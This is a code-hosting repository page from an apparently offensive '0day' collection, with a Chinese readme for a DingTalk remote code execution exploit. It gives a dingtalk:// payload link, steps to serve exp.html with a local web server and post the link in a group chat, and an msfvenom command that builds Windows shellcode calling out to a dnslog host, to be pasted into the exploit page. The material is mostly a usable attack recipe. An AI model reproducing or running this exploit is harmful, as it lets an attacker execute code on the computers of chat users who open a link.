admin/0day
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
0day/17-钉钉
History
helloexp 6ba9a02edd dingtalk rce 
添加钉钉RCE poc、exp
2022-02-17 13:36:34 +08:00
..
exp.html
dingtalk rce
2022-02-17 13:36:34 +08:00
readme.md
dingtalk rce
2022-02-17 13:36:34 +08:00

readme.md

钉钉RCE 漏洞

payload dingtalk://dingtalkclient/page/link?url=127.0.0.1/exp.html&pc_slide=true

利用方式

  1. 启动web 服务python -m http.server 80
  2. 发送payload 到钉钉聊天群组中(个人聊天不能触发)

其中shellcode 可以通过msfvenom定制

msfvenom -a x86 platform windows -p windows/exec cmd="curl xxx.dnslog.cn" -e x86/alpha_mixed -f csharp

将上面生成的内容调换到 exp.html 文件中的 var shellcode=new Uint8Array([.....])